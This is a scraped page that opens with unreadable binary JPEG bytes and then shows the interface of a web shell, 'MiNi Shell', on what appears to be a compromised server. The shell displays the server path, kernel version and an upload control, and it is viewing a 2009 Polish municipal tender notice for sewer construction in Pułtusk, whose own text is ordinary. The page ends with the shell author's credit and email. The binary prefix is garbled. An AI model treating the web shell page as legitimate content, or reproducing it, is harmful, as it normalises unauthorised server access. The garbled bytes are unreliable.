JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090310/55648-N-2009.html

<p class="kh_header"><b>Pułtusk: Budowa Kanalizacji Sanitarnej w ul. Daszyńskiego w Pułtusku</b><br>
<b>Numer ogłoszenia: 55648 - 2009; data zamieszczenia: 10.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pułtusk , ul. Rynek 41, 06-100 Pułtusk, woj. mazowieckie, tel. 023 6920391, faks 023 6924296.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pultusk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Kanalizacji Sanitarnej w ul. Daszyńskiego w Pułtusku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest budowa kanalizacji sanitarnej grawitacyjnej w ulicy Daszyńskiego w Pułtusku zgodnie z Projektem budowlano-wykonawczym kanalizacji sanitarnej w ul. Daszyńskiego w Pułtusku autorstwa Macieja Strzałkowskiego, uprawnienia budowlane nr St-99/86.
Zamawiający wymaga wykonania kanałów głównych i przyłączy do granic posesji w ulicy Daszyńskiego (droga krajowa nr 61). Projektowane kanały odprowadzają ścieki do końcówki istniejących kanałów O 0,20 w rejonie ul. Stare Miasto, ul. Nowy Rynek oraz kanału na zapleczu Wyższej Szkoły Pedagogicznej. Kanały będą wykonane w pasach drogi krajowej poza nawierzchnią. Przykanaliki powinny być zakorkowane na granicy posesji w taki sposób, aby była możliwa ich dalsza rozbudowa na terenie posesji przez właścicieli działek. 
Na kanalizacji należy wykonać studnie rewizyjne z kręgów betonowych o średnicy O1000mm oraz studnie inspekcyjne o średnicy O400mm. Po ułożeniu kanalizacji i zasypaniu wykopów należy odtworzyć zniszczone podczas wykonywania przedmiotu zamówienia nawierzchnie dróg poza nawierzchnią ul.Daszyńskiego oraz nawierzchnie chodników i przejść. 
2.	Charakterystyczne parametry przedmiotu zamówienia. 
W ramach zamówienia wykonawca powinien wykonać: 
.	Kanalizację grawitacyjną z rur PVC kielichowych SN8 i średnicach: 
- PVC O200mm 					L=1085.0m, 
- PVC O160mm 					L=177.0m. 
- Rury ochronne  z rur stalowych 322,9/8,0 ZO2W	L=140,0
.	Studnie kanalizacyjne: 
- rewizyjne z kręgów betonowych o średnicy O1000mm z włazami żeliwnym okrągłymi typ D40 szt. 33, 
- inspekcyjne PVC/PP o średnicy O400mm z rurami teleskopowymi pokrywami okrągłymi żeliwnymi typ D40 na montowanymi na pierścieniach  żelbetowych odciążających studnie szt. 41. 
.	Montaż zaślepek kanalizacyjnych (korków):
-  PVC O160mm  szt. 44, 
-  PVC O200mm szt. 2 


3.	Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia zgodnego z dokumentacją projektową po szczegółowym zapoznaniu się z nią, dokonania wizji terenu budowy, sporządzenia projektu organizacji ruchu, uzyskania niezbędnych uzgodnień, realizacji inwestycji zgodnie z wytycznymi zawartymi w decyzjach oraz do sporządzenia dokumentacji powykonawczej zarówno w formie papierowej jak i elektronicznej w pliku z rozszerzeniem pdf.
4.	Informacje o przewidywanych zamówienia uzupełniających: Zamawiający nie przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6  Pzp..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.23-8, 45.23.31.42-6, 45.23.13.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 72.000,00<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
a.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, 
jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
b.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
c.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
zamówienia,
d.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Pzp.

2	Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny
        spełniania tych warunków 

a.	doświadczenie:

     Wymagane jest wykazanie się wykonaniem  w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na:
- realizacji kanalizacji w drodze krajowej o średnicy min. 200 mm, o długości min. 900 mb, w tym 200 mb przy użyciu przecisków,
- realizacji odwodnienia wykopów dla budowy kanalizacji na długości min. 900 mb,
- realizacji robót drogowych bitumicznych w ilości min. 200 m2.

Zamawiający żąda załączenia do oferty dokumentów potwierdzających, że wykazane roboty budowlane zostały wykonane należycie.

b.	potencjał kadrowy :  

 Wymagane jest wykazanie dysponowania przez Wykonawcę osobami zdolnymi do wykonania zamówienia, tj. kierownikami budowy należącymi do właściwej izby samorządu zawodowego i posiadającymi uprawnienia zgodnie z wymogami ustawy z dnia 07.07.1994 r. Prawo budowlane (Dz. U. z 2006 r. nr 156, poz. 1118- t.j. ze zm.) w tym co najmniej:

§	kierownika budowy z co najmniej 5 letnim doświadczeniem zawodowym w tym 3 lata na stanowisku kierownika robót sanitarnych z zakresu budowy kanalizacji sanitarnej i deszczowej - licząc od daty uzyskania uprawnień, posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych i gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im uprawnienia budowlane, które były wydane na podstawie wcześniej obowiązujących przepisów oraz uprawnienia drogowe.
 
W przypadku nie dysponowania wymaganym potencjałem kadrowym wykonawca załącza do oferty pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.


                                             c. sytuacja ekonomiczna i finansowa

- Wykonawca musi posiadać ważną polisę ubezpieczeniową w zakresie prowadzonej przez siebie działalności gospodarczej na kwotę co najmniej 2.500.000,00 PLN,
- Wykonawca musi wykazać się wykonaniem w ostatnim roku obrotowym obrotu w wysokości minimum  10.000.000,00 PLN.

Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie
z formułą spełnia - nie spełnia w oparciu o oświadczenia lub dokumenty złożone przez wykonawcę w celu potwierdzenia spełniania warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu (wzór druku załącznik nr 5 do SIWZ)
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

W przypadku składania oferty przez wykonawców występujących wspólnie, wyżej wymieniony dokument musi być złożony przez każdego z wykonawców.

3.	Wykaz potwierdzający posiadanie przez wykonawcę niezbędnej wiedzy i doświadczenia zawodowego (wzór druku załącznik nr 6 do SIWZ),
4.	Dokumenty potwierdzające, że wykazane w załączniku nr 6 do SIWZ roboty budowlane zostały wykonana należycie,
5.	Wykaz potwierdzający dysponowanie przez wykonawcę osobami zdolnymi do wykonania zamówienia - wzór druku załącznik nr 7  do SIWZ,
6.	Zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób wykonawca wskazał osoby, którymi będzie dysponował w taki sposób (wzór druku załącznik nr 7a do SIWZ)
7.	Dokumenty potwierdzające posiadanie wymaganych uprawnień przez osoby wykazane w załączniku nr 7 do SIWZ.
8.	Oryginalne oświadczenia osób wskazanych do pełnienia samodzielnych funkcji technicznych przy realizacji robót o wyrażeniu zgody na podjęcie tych funkcji w związku z realizacją niniejszego zamówienia.
9.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu. Powyższe zaświadczenia muszą być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
10.	Aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt od 4 do 8 ustawy Pzp, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
11.	Aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
12.	Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 2.500.000,00 PLN.
13.	Sprawozdanie finansowe za ostatni rok obrotowy, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanym sprawozdaniu albo w przypadku wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, inne dokumenty określające obroty, zysk i należności za ostatni rok obrotowy. W przypadku braku badania sprawozdania finansowego przez biegłego rewidenta za ostatni rok obrotowy, zamawiający dopuszcza złożenie sprawozdania za rok poprzedzający..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umpultusk.bip.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Pułtusku, ul. Rynek 41, 06-100 Pułtusk, adres tymczasowej siedziby: ul. Jana Pawła II 18, 06-100 Pułtusk.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2009 godzina 10:00, miejsce: Urząd Miejski w Pułtusku, ul. Rynek 41, 06-100 Pułtusk, adres tymczasowej siedziby: ul. Jana Pawła II 18, 06-100 Pułtusk.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com